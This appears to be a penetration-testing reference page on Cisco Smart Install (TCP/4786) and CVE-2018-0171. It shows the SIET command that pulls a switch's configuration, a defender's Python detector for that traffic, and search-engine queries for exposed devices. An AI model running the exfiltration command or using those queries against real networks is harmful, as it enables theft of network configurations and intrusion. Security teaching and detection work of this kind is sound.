
💡 Learning tip: This document introduces penetration testing methods for 4786 - Cisco Smart Install and is intended as a reference for information security beginners and practitioners.

⚠️ Legal notice: This document is for learning and authorized testing only. Unauthorized testing of systems may violate laws and regulations.

4786 - Cisco Smart Install

Basic information

Cisco Smart Install is a Cisco protocol designed to automate the initial configuration and loading of an operating system image for new Cisco hardware. By default, Cisco Smart Install is active on Cisco hardware and listens on TCP port 4786.

Default port: 4786

PORT      STATE  SERVICE
4786/tcp  open   smart-install

Smart Install Exploitation Tool

In 2018, a critical vulnerability, CVE-2018-0171, was found in this protocol. Its severity is 9.8 on the CVSS scale.

A specially crafted packet sent to the TCP/4786 port, where Cisco Smart Install is active, triggers a buffer overflow, allowing an attacker to:

  • forcibly reboot the device
  • trigger remote code execution
  • steal configurations of network equipment.

The SIET (Smart Install Exploitation Tool) was developed to exploit this vulnerability; it allows you to abuse Cisco Smart Install. In this article I will show you how you can read a legitimate network hardware configuration file. Configuration exfiltration can be valuable for a pentester because it reveals the unique features of the network, which makes life easier and allows finding new vectors for an attack.

The target device will be a “live” Cisco Catalyst 2960 switch. Virtual images do not have Cisco Smart Install, so you can only practice on the real hardware.

The address of the target switch is 10.10.100.10 and CSI is active. Run SIET and start the attack. The -g argument means exfiltration of the configuration from the device, and the -i argument sets the IP address of the vulnerable target.

~/opt/tools/SIET$ sudo python2 siet.py -g -i 10.10.100.10

The configuration of switch 10.10.100.10 will be saved in the tftp/ folder.
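From the defender's side, the sequence above leaves a recognisable trace: an unexpected host opens a TCP/4786 session to a switch, and the switch then uploads its configuration over TFTP to that same host. The following detection logic is an added example, not part of the original article or of SIET; the flow records, the director allowlist (10.10.1.0/24) and the record format are constructed for illustration.

```python
import ipaddress
from datetime import datetime, timedelta

SMART_INSTALL_PORT = 4786   # Cisco Smart Install client port (TCP)
TFTP_PORT = 69              # the switch pushes its config over TFTP after a config-exfil request

# Hypothetical allowlist: only the legitimate Smart Install director may talk to TCP/4786.
ALLOWED_DIRECTORS = [ipaddress.ip_network("10.10.1.0/24")]

# Constructed flow records in the form "timestamp src dst proto sport dport".
SAMPLE_FLOWS = """\
2024-05-01T10:00:01Z 10.10.1.5 10.10.100.10 tcp 40001 22
2024-05-01T10:00:05Z 10.10.1.7 10.10.100.10 tcp 41000 4786
2024-05-01T10:01:10Z 192.168.7.3 10.10.100.10 tcp 43210 4786
2024-05-01T10:01:12Z 10.10.100.10 192.168.7.3 udp 49152 69
2024-05-01T10:02:00Z 192.168.7.3 10.10.100.11 tcp 43211 4786
"""

def parse_flows(text):
    """Parse the constructed flow format into dicts with typed fields."""
    flows = []
    for line in text.splitlines():
        ts, src, dst, proto, sport, dport = line.split()
        flows.append({"ts": datetime.fromisoformat(ts.replace("Z", "+00:00")),
                      "src": ipaddress.ip_address(src), "dst": ipaddress.ip_address(dst),
                      "proto": proto, "sport": int(sport), "dport": int(dport)})
    return flows

def is_allowed_director(addr):
    return any(addr in net for net in ALLOWED_DIRECTORS)

def detect_smart_install_abuse(flows, window=timedelta(minutes=5)):
    """Alert on TCP/4786 sessions from non-director hosts; escalate to critical when the
    targeted switch then sends TFTP to that same host within the window (config exfiltration)."""
    alerts = []
    for f in flows:
        if f["proto"] != "tcp" or f["dport"] != SMART_INSTALL_PORT or is_allowed_director(f["src"]):
            continue
        exfil = any(g["proto"] == "udp" and g["dport"] == TFTP_PORT
                    and g["src"] == f["dst"] and g["dst"] == f["src"]
                    and f["ts"] <= g["ts"] <= f["ts"] + window for g in flows)
        alerts.append({"switch": str(f["dst"]), "source": str(f["src"]),
                       "severity": "critical" if exfil else "high",
                       "reason": ("TFTP upload to the same host followed the Smart Install session"
                                  if exfil else "unexpected client on Smart Install port")})
    return alerts

if __name__ == "__main__":
    for alert in detect_smart_install_abuse(parse_flows(SAMPLE_FLOWS)):
        print(alert)
```

The first alert on the sample data is critical (switch 10.10.100.10 uploaded via TFTP to 192.168.7.3 two seconds after the 4786 session); the second is high only, because no TFTP follow-up from 10.10.100.11 is seen.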




Search engine syntax

FOFA

# FOFA search syntax
port="4786"

Shodan

# Shodan search syntax
port:4786

ZoomEye

# ZoomEye search syntax
port:4786

📖 References